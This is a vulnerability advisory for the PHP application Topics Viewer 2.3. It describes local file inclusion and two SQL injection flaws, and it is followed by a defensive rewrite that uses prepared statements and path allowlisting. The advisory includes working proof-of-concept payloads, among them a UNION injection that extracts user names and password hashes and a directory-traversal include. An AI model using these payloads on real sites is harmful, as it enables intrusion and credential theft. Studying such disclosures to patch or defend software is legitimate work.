Topics Viewer 2.3 Local File Inclusion / SQL Injection

2012.05.30
Credit: n4ss1m
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89, CWE-98

################################################################################################
# Exploit Title: Topics viewer v 2.3 Multiple Vulnerabilities
# Software Link: http://nilehoster.com/default/topicsviewer
# Author: n4ss1m
# Date: 19-05-2012
# Tested on: win/linux
# Home : www.Sec4ever.com <http://www.sec4ever.com/>
################################################################################################

# Local File Inclusion ( footer.php )

<?php
// footer file //
echo "<br>";
@include ("themes/$site_theme/templates/footer_head.html"); # <-- $site_theme is never initialised; with register_globals on it comes straight from the request
echo "<br>";
...etc...
?>

# PoC : http://domain.tld/footer.php?site_theme=../robots.txt%00
# Note : register_globals must be ON

################################################################################################

# SQL injection ( search.php )

<?
...
$q = strip_tags (trim(str_replace('"','',$_GET['q']))); # <---- $q is $_GET['q'] with only strip_tags/trim applied, no SQL escaping
...
if(isset ($q) && !empty ($q) && $q != " ") {
    $q = strip_tags(trim($_GET['q']));
    $sql_s1 = "SELECT * FROM topics where t_title like '%$q%' OR t_desc like '%$q%'"; # <-- $q is interpolated unescaped into the query
    $res_s1 = @mysql_query($sql_s1);
...
?>

# PoC : http://domain.tld/search.php?q=junk'+union+select+1,group_concat(u_name,0x3a,u_mpass),3,4,5,6,7,8,9,10,11,12+from+users+where+u_id=1%23&search=true
# magic_quotes_gpc must be OFF

################################################################################################

# Blind SQL injection ( lost.php )

<?
....
if(!empty($_POST[uname]) && !empty($_POST[reg_mail]) && !empty($_POST[to_mail]) && strstr($_POST[to_mail],".") && strstr($_POST[to_mail],"@") && strstr($_POST[reg_mail],".") && strstr ($_POST[reg_mail],"@") ){
    $s_pass = md5($_POST[s_pass]);
    $sql_ver = "SELECT * FROM users where u_name = '$_POST[uname]' AND u_email = '$_POST[reg_mail]'"; # <-- $_POST[uname] is interpolated unescaped, so the query can be altered from the form
    $res_ver = @mysql_query ($sql_ver);
    $result_ver = @mysql_numrows($res_ver);
    $user = @mysql_fetch_assoc($res_ver);
....
?>

# PoC : POST : uname=junk'[SQL injection]%23_mail=email@email.tld&to_mail=email2@email.tld&B1=true http://domain.tld/lost.php
# magic_quotes_gpc must be OFF

################################################################################################
# References : http://www.exploit4arab.com/exploits/69
# Vendor reported on : 19-05-2012
# published on : 27-05-2012
################################################################################################
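The three flagged spots rewritten the way a maintainer would fix them, as an added example that is neither Topics Viewer's code nor the advisory author's PoC. It assumes the table and column names the snippets above show, and uses an in-memory SQLite database (pdo_sqlite) in place of MySQL so it runs offline; the theme resolver builds a throwaway themes directory under the system temp path for the same reason.

```php
<?php
// Added example, not part of the original advisory or of Topics Viewer:
// hardened versions of footer.php, search.php and lost.php. Assumptions:
// the table/column names from the advisory, and an in-memory SQLite
// database standing in for MySQL so the script runs offline.
declare(strict_types=1);

// footer.php: take the theme name from an explicit parameter (never from an
// undefined global), allow only a strict character set, and confirm the
// resolved file still lies under the themes root.
function resolveThemeFile(string $themesRoot, string $theme, string $file = 'footer_head.html'): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $theme)) {
        return null;                 // rejects "../", NUL bytes, slashes, empty
    }
    $root = realpath($themesRoot);
    $path = realpath($themesRoot . '/' . $theme . '/templates/' . $file);
    if ($root === false || $path === false) {
        return null;                 // unknown theme or missing template
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;                 // resolved outside the themes directory
    }
    return $path;
}

// search.php: the search term is bound as data, so quotes in it never reach
// the SQL parser; LIKE metacharacters are escaped so "%" is searched literally.
function searchTopics(PDO $db, string $q): array
{
    $q = trim(strip_tags($q));
    if ($q === '') {
        return [];
    }
    $pattern = '%' . addcslashes($q, '%_\\') . '%';
    $stmt = $db->prepare(
        "SELECT t_title, t_desc FROM topics
         WHERE t_title LIKE :p1 ESCAPE '\\' OR t_desc LIKE :p2 ESCAPE '\\'"
    );
    $stmt->execute([':p1' => $pattern, ':p2' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// lost.php: both lookup values are bound, and the address is validated
// properly instead of with strstr() checks for "." and "@".
function findUserForReset(PDO $db, string $uname, string $regMail): ?array
{
    if (filter_var($regMail, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT u_id, u_name, u_email FROM users WHERE u_name = :n AND u_email = :m');
    $stmt->execute([':n' => $uname, ':m' => $regMail]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- self-contained demo with constructed data ---------------------------
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE topics (t_id INTEGER PRIMARY KEY, t_title TEXT, t_desc TEXT)');
$db->exec('CREATE TABLE users (u_id INTEGER PRIMARY KEY, u_name TEXT, u_email TEXT, u_mpass TEXT)');
$db->exec("INSERT INTO topics (t_title, t_desc) VALUES ('Hello world', 'first post'), ('Admin notes', '100% private')");
$db->exec("INSERT INTO users (u_name, u_email, u_mpass) VALUES ('admin', 'admin@example.invalid', 'placeholder-hash')");

// constructed themes directory so resolveThemeFile() has something to resolve
$themes = sys_get_temp_dir() . '/tv_demo_' . getmypid();
mkdir($themes . '/default/templates', 0700, true);
file_put_contents($themes . '/default/templates/footer_head.html', '<!-- constructed template -->');

foreach (['default', '../robots.txt', "default\0"] as $theme) {
    printf("theme %-18s -> %s\n", json_encode($theme), resolveThemeFile($themes, $theme) ?? 'rejected');
}
foreach (['hello', '100%', "junk' OR '1'='1"] as $q) {
    printf("search %-18s -> %d row(s)\n", json_encode($q), count(searchTopics($db, $q)));
}
printf("reset lookup with a quoted user name -> %s\n",
    findUserForReset($db, "admin' OR '1'='1", 'x@example.invalid') === null ? 'no match' : 'match');

unlink($themes . '/default/templates/footer_head.html');
rmdir($themes . '/default/templates');
rmdir($themes . '/default');
rmdir($themes);
```

Run it with `php fix_example.php`; only the literal theme name resolves, the two search terms containing a quote or a percent sign are matched as plain text, and the quoted user name finds no row. Two of the three preconditions the advisory names no longer exist in current PHP: register_globals and magic_quotes_gpc were removed in PHP 5.4, and the mysql_* functions in PHP 7.0, so the prepared-statement rewrite is also the only route left on a supported interpreter. The allowlist check in resolveThemeFile() is what actually closes the inclusion bug; relying on the interpreter's NUL-byte rejection or on the include path staying inside the web root is not a fix.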

References:

http://www.sec4ever.com/

